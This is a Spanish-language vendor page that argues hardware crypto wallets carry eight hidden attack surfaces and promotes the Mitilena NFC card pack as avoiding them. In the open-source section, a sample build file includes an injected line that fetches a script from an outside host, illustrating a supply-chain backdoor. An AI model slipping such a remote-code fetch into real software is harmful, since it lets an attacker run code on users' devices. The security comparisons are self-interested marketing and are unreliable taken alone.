8 brechas Código abierto Lista de control Preguntas
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Crear monederoCrear
Monederos hardware · brechas no obvias

Brechas no obvias del monedero hardware

Compras un dispositivo para cerrar agujeros. Con él llegan otros: firmware, actualizaciones, un servicio en el ordenador, pantalla, caja, cuenta en el vendedor. Ocho detalles que las reseñas apuntan como ventajas — y ocho formas de llevarse el dinero a través de ellos en 2020-2026.

Casos reales con fechas y cifras Según la documentación de los fabricantes El pack lo contrastamos con la misma lista
Precio del errorcasos públicos
2026Coldcard · aleatoriedad débil en el firmware100+ M$
2025Bybit · los firmantes firmaron lo que no veían1.500 M$
2024Dark Skippy · el seed se filtra en dos firmasinvestigación
2023Ledger Connect Kit · puerta trasera en una librería600 mil $
2021App falsa de monedero en el App Store17,1 BTC
2020Fuga de la base de clientes de Ledger · phishing durante años270 000 pers.
Ocho brechas

Cada detalle que alaban las reseñas es un agujero aparte

El monedero hardware cierra un agujero: la clave ya no está en un teléfono con internet. Pero el dispositivo no está vacío. Tiene firmware, actualizaciones, un programa en el ordenador, pantalla, caja, un vendedor con tu dirección — y cada detalle añade una superficie de ataque que antes no tenías. Abajo van ocho de esos detalles: qué dicen las reseñas, cómo se llevaron dinero por ellos, cómo cerrar la brecha y si ese detalle está en nuestro pack.

Brecha 01

El firmware que crea tu clave

En las reseñas: «chip protegido, la clave se crea dentro del dispositivo y nunca lo abandona»

La clave es un número aleatorio enorme, y lo genera el firmware. Un error ahí — y en realidad hay pocas claves: las enumeran en todos los dueños a la vez, sin acceso al dispositivo, años después de la compra. El chip no tiene la culpa; el agujero está por encima.

Caso
100+ M$
Coldcard, julio 2026: un error de build del firmware desde 2021 sustituía en silencio el generador hardware por uno débil, sembrado con el número del dispositivo y el temporizador. La resistencia de las claves cayó a unos 40 bits; 5.000+ direcciones vaciadas.
Cómo cerrar la brecha
Si puedes aportar tu propia aleatoriedad: dados, una frase tuya. Un monedero que acepta entropía tuya no depende de un solo error en el firmware.
Ese detalle no lo tenemos
En la tarjeta no hay firmware: es un soporte cifrado. La clave la crea Mitilena Air con el generador del sistema del dispositivo, y puedes poner tu propia frase-seed en lugar de palabras aleatorias.
Brecha 02

Actualizaciones que estás obligado a instalar

En las reseñas: «el fabricante publica actualizaciones de seguridad con regularidad»

Cada actualización es el momento en que se puede sustituir el firmware. Un firmware adulterado esconde trozos del seed en dos o tres firmas normales, y por fuera el dispositivo sigue igual. No actualizar tampoco vale: los agujeros se tapan justo con actualizaciones.

Caso
2 firmas
Dark Skippy, agosto 2024: los investigadores mostraron que un firmware malicioso de monedero hardware se lleva todo el seed en dos transacciones. Basta actualizar una sola vez desde el sitio equivocado.
Cómo cerrar la brecha
De dónde llegan los firmwares y si el dispositivo verifica su firma. Lo mejor es cuando no hay nada que actualizar.
Ese detalle no lo tenemos
En la tarjeta no hay nada que actualizar ni sustituir. Firma la app del teléfono, y sus builds van firmadas y llegan de App Store y Google Play — como cualquier app que ves y cierras tú.
Brecha 03 · Siente el absurdo
En las reseñas: «cómoda aplicación oficial para el ordenador»

Un monedero para la desconfianza al que le va un servicio de serie

Compras el dispositivo por una sola razón: para dejar de confiar en el ordenador. Para que funcione, hay que instalar un servicio en segundo plano en ese mismo ordenador. No lo escribiste, no lo arrancas y no lo controlas: arranca con el sistema, escucha un puerto al que puede llamar cualquier programa de tu máquina y hace algo ahora mismo — qué exactamente, no lo sabes y nunca lo comprobarás.

Seguía en segundo plano incluso después de cerrar el monedero. Durante años. En uno de los mayores fabricantes era un servicio-«puente» aparte; en 2025 lo metieron dentro de la propia app — el servicio sigue ahí, solo muere con la ventana. En la mayoría de los demás, sin programa en el ordenador el dispositivo es un llavero. En Linux añade reglas udev, o el sistema no cede el USB.

Es decir: la cosa que compraste para no depender de programas en el ordenador no funciona sin un programa en el ordenador. Y no el que ves, sino el que corre debajo.

Ese detalle no lo tenemos
En el ordenador no se instala nada: ni servicio, ni driver, ni puerto. El intermediario es el chip NFC que ya está en tu teléfono, hecho por su fabricante y sujeto al sistema operativo: solo funciona cuando la app está abierta y tú acercas la tarjeta, y el teléfono pide permiso cada vez. La tarjeta es pasiva: sin batería, sin radio, no hace nada sola. Cierras la app — no queda nada que trabaje sin ti. Con franqueza: hace falta la app del teléfono, y es como cualquier otra — la ves, la abres y la cierras tú. En el trastero no vive nadie.
Monitor del sistemaMONEDERO CERRADO
ProcesoEstadoActivo
HW Wallet Appmonedero
cerrado por ti-
hwwalletdservicio en segundo plano · puente USB
activo412 d. 06:14
lanzado por el sistema al iniciar sesiónno se puede cerrar — es un servicio
Mockup, nombres ficticios. Así se veía un ordenador con uno de los USB-wallets más populares hasta 2025; luego el «puente» se metió en la propia app — el servicio es el mismo, solo que ya no aparece en la lista.
Alegoría
Una casa por la privacidad — y un inquilino en el trastero

Querías una casa por la privacidad. La compraste. Luego hizo falta seguridad — la pusiste. Y para que la tarifa de seguridad funcionara, te pidieron dejar entrar a alguien de uniforme que vive en tu trastero las 24 horas, tiene llaves de todas las puertas y rinde cuentas a otro. No lo contrataste, no puedes despedirlo, y qué hace de noche — no lo sabes.

Claro que es «de los vuestros». Así lo dice el contrato. Querías privacidad y te quedó un sucedáneo: una casa con un inquilino que no elegiste.

Brecha 04 · Código abierto no es auditoría
En las reseñas: «código abierto — cualquiera puede auditarlo»

El código abierto es una forma de que los programadores trabajen juntos, no una marca de que el programa no roba

El código fuente abierto se inventó para compartir programas y arreglarlos juntos. Es una herramienta de trabajo colaborativo, y en eso es excelente. Nunca fue un sello de calidad de «este software no te robará el dinero», y por esto: tú no usas el código fuente. Usas lo que descargaste.

Entre el repositorio en GitHub y el archivo en tu teléfono hay build, tienda de apps, actualización, servidor. En cualquiera de esos pasos puede colarse una línea que cargue lo que sea desde donde sea — y en el repositorio no estará. No puedes comparar tu copia con el fuente: las tiendas dan un binario compilado, el monedero web en cada apertura recibe el código que el servidor decidió darte hoy, la extensión del navegador se actualiza en silencio por la noche.

«Abierto» significa que algunas personas pueden revisar alguna versión algún día. Qué hace tu copia ahora mismo — no lo implica.

En el repositorio · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
En tu teléfono · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Una línea en el build. En el repositorio no está, en la tienda no se ve, en tu dispositivo sí corre.
La apertura no impidió ninguno de estos casos
Ledger Connect Kit2023
librería abierta en GitHub; publicaron una versión maliciosa en npm y decenas de sitios la cargaron en vivo en pocas horas
Copay / event-stream2018
monedero abierto; la puerta trasera llegó por una dependencia apuntada justo a él
xz utils2024
abierto veinte años; el backdoor vivía en los releases hasta que un ingeniero notó por casualidad que el login SSH iba medio segundo más lento
Coldcard2026
firmware de código abierto; un error de build sustituyó cinco años el generador hardware por uno débil — claves enumeradas sin acceso al dispositivo, 5.000+ direcciones, 100+ millones de dólares
Qué sí funciona
No leer el código ajeno, sino dos comprobaciones al alcance de cualquiera. La primera — auditoría de comportamiento: pon un proxy de interceptación en tu ordenador, pasa la app por él y mira qué envía y a dónde. No hace falta leer el código — el tráfico se ve entero. La segunda — una arquitectura en la que al código no le queda nada que robar: si la clave nunca está en un dispositivo con internet, cualquier línea en cualquier actualización es impotente; no tiene qué enviar.
Cómo es en nosotros
Lo primero lo ofrecemos nosotros: pasa nuestra app por un proxy, la versión web — por DevTools del navegador, y mira cada petición. La clave de firma y el seed no aparecerán; la única salvedad es la clave de visualización de Monero, de eso en la página «Cómo sale la transferencia». Lo segundo — en el pack: la clave nace en Mitilena Air en un dispositivo sin internet, vive en la tarjeta, y a la app online solo llega la firma — ahí no hay qué interceptar. Y el offline aquí es de verdad: en modo air-gap el dispositivo con la clave no está conectado a nada — ni cable ni Bluetooth; la transacción entra y sale por un QR que ves con los ojos. No un monedero «frío» con cable colgado de un ordenador online con su servicio intercambiando quién sabe qué.
Brecha 05

Una pantalla en la que no se ve qué firmas

En las reseñas: «confirmación en la pantalla del dispositivo — el virus del ordenador no puede nada»

La pantalla es pequeña y a menudo no muestra dirección y cantidad, sino un hash o «llamada a contrato». Confirmas lo que no ves — y la firma es honesta, tuya. La pantalla da una sensación de control que no existe.

Caso
1.500 M$
Bybit, febrero 2025: firmantes con monederos hardware confirmaron una transferencia que en la interfaz parecía normal. Los dispositivos mostraron datos que una persona no podía contrastar.
Cómo cerrar la brecha
Destinatario, cantidad y tipo de operación en lenguaje humano, no un hash, y rechazo con un botón.
Cómo es en nosotros
Hay pantalla, pero es la del teléfono: dirección, cantidad y tipo de petición en palabras — transferencia, llamada a contrato, permiso — y el botón «Rechazar». Para sumas grandes — un dispositivo aparte sin red, al que la transacción llega entera.
Brecha 06

Una caja donde ya viene el seed

En las reseñas: «llega en caja sellada con precinto de seguridad»

Un dispositivo físico es envío, intermediarios y marketplaces «con descuento». El monedero llega ya configurado, con el seed en un papel dentro. O una app-doble en la tienda pide «introduce el seed para activar».

Caso
17,1 BTC
App Store, 2021: el dueño de un monedero hardware introdujo el seed en una app-doble y perdió 17,1 BTC. Ese mismo año, tras la fuga de la base, a clientes de Ledger les enviaban dispositivos falsos con la carta «pasa el seed al nuevo».
Cómo cerrar la brecha
Inicializarlo tú y no usar nunca un seed que llegó ya escrito. El precinto no es una prueba; la prueba es que la clave la creas tú.
Cómo es en nosotros
Las tarjetas llegan limpias: la clave la creas y la escribes tú; un seed «listo» en la caja es imposible. La app — solo de App Store y Google Play por enlaces del sitio; el seed solo lo pide al importar y al firmar.
Brecha 07

Una cuenta en el fabricante

En las reseñas: «garantía oficial, soporte y área personal»

Para comprar el dispositivo dejas al fabricante nombre, correo y dirección de envío. Ahora tu seguridad depende de su base. Si se filtra — te escribirán años «confirma el seed en el dispositivo nuevo», a veces con paquetes.

Caso
270 000 pers.
Ledger, 2020: se filtraron datos de 270.000 compradores, incluidas direcciones postales. Cartas, llamadas y paquetes pidiendo «migrar» el seed siguen hasta hoy.
Cómo cerrar la brecha
Cuanto menos sepan de ti, más corto el vector: compra sin cuenta, un soporte que nunca pide el seed, y la regla «el seed solo lo pide un ladrón».
Ese detalle no lo tenemos
El monedero funciona sin registro, no hay cuenta. El vendedor solo conoce la dirección de envío. Ni el soporte ni la app piden el seed.
Brecha 08

Un solo dispositivo y un solo papel

En las reseñas: «carcasa robusta, pantalla grande, batería para una semana»

Cuantos más detalles, más se rompe: conector, pantalla, batería. Y la recuperación choca con un solo papel con el seed — mojado, perdido en una mudanza, fotografiado «por si acaso». La causa más frecuente de pérdidas no es el hackeo.

Caso
≈20 % BTC
Según Chainalysis, cerca de una quinta parte de todos los bitcoins se han perdido para siempre — sobre todo por claves perdidas, no por hackeos.
Cómo cerrar la brecha
Cuántas copias de la clave vienen de caja y en qué forma, qué pasa si pierdes el dispositivo, si hay algo que se pueda romper.
Ese detalle no lo tenemos
Sin pantalla, batería ni conector — no hay qué romper. Y no una sola copia, sino cinco espejo de caja: dos tarjetas NFC y tres pegatinas stealth en plástico impermeable, 10+ años.
Lista de control

Lo que no debería estar en un monedero

Ocho detalles por ocho brechas. La lista vale para cualquier monedero — hardware, móvil, de navegador. Marca lo que tiene el que eliges — y el nuestro también.

01
Una clave que solo crea el programasin tu aleatoriedad — tu frase o dados
02
Actualizaciones donde vive la clavecada actualización es una oportunidad de sustituir
03
Servicio, driver o puerto en el ordenadorver brecha 03
04
Insignia «open source» en lugar de arquitecturala clave donde puede entrar código ajeno
05
Pantalla con hash en lugar de dirección y cantidady sin botón «Rechazar»
06
Un seed que llegó ya escritoen la caja, en un correo, en la «app de activación»
07
Una cuenta en el fabricantey un soporte que puede pedir el seed
08
Una sola copia y piezas que se rompenpantalla, batería, conector, un solo papel
El pack Ultimate, según esta lista, no tiene ninguno de los ocho detalles. En la caja: 2 tarjetas NFC y 3 pegatinas stealth, Mitilena Air (claves sin internet) y Mitilena Keys (firma sin internet). Las tarjetas llegan vacías: la clave la creas y cifras tú, no un chip de fábrica. Contenido y precio →
Ultimate · pack offline

No un «chip seguro» de fábrica — un soporte que cifras tú

Las tarjetas llegan vacías. La clave la creas en Mitilena Air en un teléfono sin internet y la escribes tú. La firma — con Mitilena Keys, también sin red: la transacción va por QR. En la caja cinco copias iguales: 2 tarjetas NFC y 3 pegatinas stealth en plástico impermeable. 18 redes, 20.000+ monedas, incluido USDT.

Nada se instala en el ordenador
Sin firmware, actualizaciones, pantalla ni batería
La transacción al teléfono offline — por sonido o QR, sin cable ni USB
Funciona con la app gratuita Mitilena en el teléfono
Plástico impermeable, vida útil 10+ años
Envío a Europa 3–5 días · resto del mundo ~7 días · 7 € fijos
Tarjeta NFC Mitilena
Ultimate · generación y firma sin red
29 900 ₽35 000 ₽
2 tarjetas NFC · 3 pegatinas stealth · Mitilena Air · licencia Mitilena Keys
Pedir Ultimate · 369 € Básico y Premium — desde 79 €
Preguntas

Lo que preguntan al llegar hasta aquí

¿Ventajas y desventajas del monedero hardware, en corto?

Una sola ventaja, y es grande: la clave no está en un teléfono con internet. Las desventajas son los ocho detalles de arriba; cada uno añade superficie de ataque. Un buen monedero hardware es el que tiene menos detalles, no más.

¿Y si el teléfono está infectado?

Con la tarjeta en el teléfono principal la clave aparece en un entorno aislado el segundo de la firma — el mismo riesgo que cualquier monedero en el teléfono, solo más corto. Para sumas que dan miedo — un segundo nivel: firma en un dispositivo aparte sin internet, al que la transacción llega por QR.

¿Qué pasa si roban o pierden la tarjeta?

Sin contraseña, la tarjeta y la pegatina son plástico inútil: la clave está cifrada. Y la copia perdida la sustituyen las otras cuatro: dos tarjetas y tres pegatinas de caja — espejo.

¿Hay que actualizar el firmware del monedero hardware?

Si el fabricante cerró un agujero — sí, y ese es justo el momento en que se puede sustituir el firmware: comprueba origen y firma. En un soporte sin firmware esa elección no existe — no hay qué actualizar ni sustituir.

¿En qué se diferencia de un monedero USB?

En la ausencia de intermediarios: sin cable, driver, servicio en segundo plano ni programa en el ordenador. El intermediario es uno — el chip NFC de tu teléfono, y obedece a ti y al sistema operativo, no al fabricante del monedero.

¿Código abierto = seguro?

Significa auditable por alguien en algún momento. Tú no usas el código, sino lo que descargaste, y no puedes comparar uno con otro. La seguridad la da una arquitectura donde la clave no está donde puede entrar código ajeno.

Tarjetas NFC con generación y firma sin internet

5 copias de la clave · Air · Keys · o monedero gratis en 30 segundos · Por qué el «frío hardware» en chip suele ser fake →
Pedir Ultimate · 369 € Crear monedero gratis